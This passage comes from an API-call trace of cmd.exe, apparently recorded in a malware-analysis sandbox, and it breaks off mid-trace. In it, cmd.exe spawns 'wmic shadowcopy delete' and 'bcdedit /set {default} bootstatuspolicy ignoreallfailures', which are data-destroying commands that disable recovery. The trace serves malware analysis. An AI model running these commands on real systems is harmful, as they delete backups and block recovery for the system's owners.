[0177.830] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x1cef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef10) returned 0x311bc0 [0177.830] FindClose (in: hFindFile=0x311bc0 | out: hFindFile=0x311bc0) returned 1 [0177.830] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0177.830] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0177.830] GetConsoleTitleW (in: lpConsoleTitle=0x1cf460, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0177.831] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf218, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf1d8 | out: lpAttributeList=0x1cf218, lpSize=0x1cf1d8) returned 1 [0177.831] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf218, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf1c8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf218, lpPreviousValue=0x0) returned 1 [0177.831] GetStartupInfoW (in: lpStartupInfo=0x1cf330 | out: lpStartupInfo=0x1cf330*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0177.831] GetProcessHeap () returned 0x310000 [0177.831] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x20) returned 0x32af20 [0177.831] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0177.831] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0177.831] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0177.831] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0177.831] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0177.831] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0177.831] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0177.831] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0177.831] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0177.831] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0177.831] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0177.831] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0177.831] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0177.831] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0177.831] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0177.832] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0177.832] GetProcessHeap () returned 0x310000 [0177.832] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32af20 | out: hHeap=0x310000) returned 1 [0177.832] GetProcessHeap () returned 0x310000 [0177.833] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x12) returned 0x32a1e0 [0177.833] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0177.833] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="wmic shadowcopy delete ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1cf250*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wmic shadowcopy delete ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf200 | out: lpCommandLine="wmic shadowcopy delete ", lpProcessInformation=0x1cf200*(hProcess=0x50, hThread=0x54, dwProcessId=0xef8, dwThreadId=0xa44)) returned 1 [0177.999] CloseHandle (hObject=0x54) returned 1 [0177.999] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0177.999] GetProcessHeap () returned 0x310000 [0177.999] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32c360 | out: hHeap=0x310000) returned 1 [0177.999] GetEnvironmentStringsW () returned 0x332ad0* [0177.999] GetProcessHeap () returned 0x310000 [0177.999] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb0e) returned 0x32b840 [0178.000] FreeEnvironmentStringsW (penv=0x332ad0) returned 1 [0178.000] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0202.800] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1cf148 | out: lpExitCode=0x1cf148*=0x0) returned 1 [0202.800] CloseHandle (hObject=0x50) returned 1 [0202.800] _vsnwprintf (in: _Buffer=0x1cf3b8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf158 | out: _Buffer="00000000") returned 8 [0202.800] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0202.800] GetProcessHeap () returned 0x310000 [0202.800] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32b840 | out: hHeap=0x310000) returned 1 [0202.800] GetEnvironmentStringsW () returned 0x332ad0* [0202.800] GetProcessHeap () returned 0x310000 [0202.800] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb0e) returned 0x32b840 [0202.801] FreeEnvironmentStringsW (penv=0x332ad0) returned 1 [0202.801] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0202.801] GetProcessHeap () returned 0x310000 [0202.801] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32b840 | out: hHeap=0x310000) returned 1 [0202.801] GetEnvironmentStringsW () returned 0x332ad0* [0202.801] GetProcessHeap () returned 0x310000 [0202.801] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb0e) returned 0x32b840 [0202.801] FreeEnvironmentStringsW (penv=0x332ad0) returned 1 [0202.801] GetProcessHeap () returned 0x310000 [0202.801] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32a1e0 | out: hHeap=0x310000) returned 1 [0202.801] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf218 | out: lpAttributeList=0x1cf218) [0202.801] GetConsoleTitleW (in: lpConsoleTitle=0x1cf850, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0202.801] GetProcessHeap () returned 0x310000 [0202.801] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x218) returned 0x3290d0 [0202.801] GetProcessHeap () returned 0x310000 [0202.801] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x88) returned 0x311bc0 [0202.801] GetProcessHeap () returned 0x310000 [0202.801] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x420) returned 0x3292f0 [0202.801] SetErrorMode (uMode=0x0) returned 0x0 [0202.802] SetErrorMode (uMode=0x1) returned 0x0 [0202.802] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x329300, lpFilePart=0x1cf0e0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1cf0e0*="Desktop") returned 0x25 [0202.802] SetErrorMode (uMode=0x0) returned 0x1 [0202.802] GetProcessHeap () returned 0x310000 [0202.802] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x3292f0, Size=0x6c) returned 0x3292f0 [0202.802] GetProcessHeap () returned 0x310000 [0202.802] RtlSizeHeap (HeapHandle=0x310000, Flags=0x0, MemoryPointer=0x3292f0) returned 0x6c [0202.802] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0cf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.802] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.802] GetProcessHeap () returned 0x310000 [0202.802] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x128) returned 0x329370 [0202.802] GetProcessHeap () returned 0x310000 [0202.802] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x240) returned 0x3294a0 [0202.802] GetProcessHeap () returned 0x310000 [0202.802] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x3294a0, Size=0x12a) returned 0x3294a0 [0202.802] GetProcessHeap () returned 0x310000 [0202.802] RtlSizeHeap (HeapHandle=0x310000, Flags=0x0, MemoryPointer=0x3294a0) returned 0x12a [0202.802] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0cf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.802] GetProcessHeap () returned 0x310000 [0202.802] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xe8) returned 0x3295e0 [0202.802] GetProcessHeap () returned 0x310000 [0202.802] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x3295e0, Size=0x7e) returned 0x3295e0 [0202.802] GetProcessHeap () returned 0x310000 [0202.802] RtlSizeHeap (HeapHandle=0x310000, Flags=0x0, MemoryPointer=0x3295e0) returned 0x7e [0202.802] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.802] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x1cee50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee50) returned 0xffffffffffffffff [0202.803] GetLastError () returned 0x2 [0202.803] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x1cee50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee50) returned 0xffffffffffffffff [0202.803] GetLastError () returned 0x2 [0202.803] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.803] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x1cee50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee50) returned 0x325e90 [0202.803] FindClose (in: hFindFile=0x325e90 | out: hFindFile=0x325e90) returned 1 [0202.803] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x1cee50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee50) returned 0xffffffffffffffff [0202.803] GetLastError () returned 0x2 [0202.803] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x1cee50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee50) returned 0x325e90 [0202.804] FindClose (in: hFindFile=0x325e90 | out: hFindFile=0x325e90) returned 1 [0202.804] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0202.804] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0202.804] GetConsoleTitleW (in: lpConsoleTitle=0x1cf3a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0202.804] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf158, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf118 | out: lpAttributeList=0x1cf158, lpSize=0x1cf118) returned 1 [0202.804] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf158, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf108, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf158, lpPreviousValue=0x0) returned 1 [0202.804] GetStartupInfoW (in: lpStartupInfo=0x1cf270 | out: lpStartupInfo=0x1cf270*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0202.804] GetProcessHeap () returned 0x310000 [0202.804] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x20) returned 0x32af20 [0202.804] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.804] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0202.804] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.804] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.804] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.804] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.804] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.804] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.804] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.804] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.804] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.804] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0202.805] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0202.805] GetProcessHeap () returned 0x310000 [0202.805] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32af20 | out: hHeap=0x310000) returned 1 [0202.805] GetProcessHeap () returned 0x310000 [0202.805] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x12) returned 0x32a1e0 [0202.805] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0202.806] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit /set {default} bootstatuspolicy ignoreallfailures ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1cf190*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit /set {default} bootstatuspolicy ignoreallfailures ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf140 | out: lpCommandLine="bcdedit /set {default} bootstatuspolicy ignoreallfailures ", lpProcessInformation=0x1cf140*(hProcess=0x54, hThread=0x50, dwProcessId=0xb78, dwThreadId=0xa94)) returned 1 [0203.597] CloseHandle (hObject=0x50) returned 1 [0203.597] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0203.597] GetProcessHeap () returned 0x310000 [0203.597] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32b840 | out: hHeap=0x310000) returned 1 [0203.597] GetEnvironmentStringsW () returned 0x332ad0* [0203.597] GetProcessHeap () returned 0x310000 [0203.597] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb0e) returned 0x32b840 [0203.597] FreeEnvironmentStringsW (penv=0x332ad0) returned 1 [0203.597] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0204.358] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1cf088 | out: lpExitCode=0x1cf088*=0x0) returned 1 [0204.358] CloseHandle (hObject=0x54) returned 1 [0204.358] _vsnwprintf (in: _Buffer=0x1cf2f8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf098 | out: _Buffer="00000000") returned 8 [0204.358] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0204.358] GetProcessHeap () returned 0x310000 [0204.358] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32b840 | out: hHeap=0x310000) returned 1 [0204.358] GetEnvironmentStringsW () returned 0x332ad0* [0204.358] GetProcessHeap () returned 0x310000 [0204.358] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb0e) returned 0x32b840 [0204.358] FreeEnvironmentStringsW (penv=0x332ad0) returned 1 [0204.358] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0204.358] GetProcessHeap () returned 0x310000 [0204.358] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32b840 | out: hHeap=0x310000) returned 1 [0204.358] GetEnvironmentStringsW () returned 0x332ad0* [0204.358] GetProcessHeap () returned 0x310000 [0204.358] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb0e) returned 0x32b840 [0204.358] FreeEnvironmentStringsW (penv=0x332ad0) returned 1 [0204.358] GetProcessHeap () returned 0x310000 [0204.358] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32a1e0 | out: hHeap=0x310000) returned 1 [0204.359] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf158 | out: lpAttributeList=0x1cf158) [0204.359] GetConsoleTitleW (in: lpConsoleTitle=0x1cf790, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0204.359] GetProcessHeap () returned 0x310000 [0204.359] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x218) returned 0x32c360 [0204.359] GetProcessHeap () returned 0x310000 [0204.359] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x68) returned 0x325e90 [0204.359] GetProcessHeap () returned 0x310000 [0204.359] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x420) returned 0x32c580 [0204.359] SetErrorMode (uMode=0x0) returned 0x0 [0204.359] SetErrorMode (uMode=0x1) returned 0x0 [0204.359] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x32c590, lpFilePart=0x1cf020 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1cf020*="Desktop") returned 0x25 [0204.359] SetErrorMode (uMode=0x0) returned 0x1 [0204.359] GetProcessHeap () returned 0x310000 [0204.359] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x32c580, Size=0x6c) returned 0x32c580 [0204.359] GetProcessHeap () returned 0x310000 [0204.359] RtlSizeHeap (HeapHandle=0x310000, Flags=0x0, MemoryPointer=0x32c580) returned 0x6c [0204.359] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0cf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0204.360] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0204.360] GetProcessHeap () returned 0x310000 [0204.360] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x128) returned 0x329670 [0204.360] GetProcessHeap () returned 0x310000 [0204.360] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x240) returned 0x32c600 [0204.360] GetProcessHeap () returned 0x310000 [0204.360] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x32c600, Size=0x12a) returned 0x32c600 [0204.360] GetProcessHeap () returned 0x310000 [0204.360] RtlSizeHeap (HeapHandle=0x310000, Flags=0x0, MemoryPointer=0x32c600) returned 0x12a [0204.360] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0cf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.360] GetProcessHeap () returned 0x310000 [0204.360] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xe8) returned 0x32c740 [0204.360] GetProcessHeap () returned 0x310000 [0204.360] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x32c740, Size=0x7e) returned 0x32c740 [0204.360] GetProcessHeap () returned 0x310000 [0204.360] RtlSizeHeap (HeapHandle=0x310000, Flags=0x0, MemoryPointer=0x32c740) returned 0x7e [0204.360] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.360] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x1ced90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced90) returned 0xffffffffffffffff [0204.361] GetLastError () returned 0x2 [0204.361] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x1ced90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced90) returned 0xffffffffffffffff [0204.361] GetLastError () returned 0x2 [0204.361] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.361] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x1ced90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced90) returned 0x325f00 [0204.361] FindClose (in: hFindFile=0x325f00 | out: hFindFile=0x325f00) returned 1 [0204.361] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x1ced90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced90) returned 0xffffffffffffffff [0204.361] GetLastError () returned 0x2 [0204.361] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ced90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced90) returned 0x325f00 [0204.361] FindClose (in: hFindFile=0x325f00 | out: hFindFile=0x325f00) returned 1 [0204.362] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0204.362] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0204.362] GetConsoleTitleW (in: lpConsoleTitle=0x1cf2e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0204.362] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf098, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf058 | out: lpAttributeList=0x1cf098, lpSize=0x1cf058) returned 1 [0204.362] 